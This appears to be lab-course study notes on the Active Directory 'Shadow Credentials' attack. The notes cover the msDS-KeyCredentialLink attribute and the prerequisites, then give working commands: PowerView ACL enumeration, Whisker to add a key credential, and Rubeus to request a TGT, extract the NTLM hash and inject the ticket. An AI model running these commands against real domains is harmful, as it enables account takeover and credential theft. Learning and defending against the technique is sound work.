- Users and Computers have msDS-KeyCredentialLink attribute that contains the raw public keys of certificate that can be used as an alternate credential.
- This attribute is used when we configure Windows Hello for Business (WHfB)
- By default, Key Admins and Enterprise Key Admins have rights to modify the msDS-KeyCredentialLink attribute.
- User to User (U2U) Service Ticket can be requested to decrypt the encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity from Privilege Attribute Certificate (PAC) and extract NTLM hash.
- Pre-requisites to abuse Shadow Credentials:
- AD CS (Key Trust if AD CS is not present)
- Support for PKINIT and at least one DC with Windows Server 2016 or
above.
- Permissions (GenericWrite/GenericAll) to modify the msDSKeyCredentialLink attribute of the target object
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}
- Add the Shadow Credential.
Whisker.exe add /target:supportXuser
- Request the TGT by leveraging the certificate.
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap
- Inject the TGT in the current session or use the NTLM hash
Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...
Shadow Credentials - User
Shadow Credentials – Computer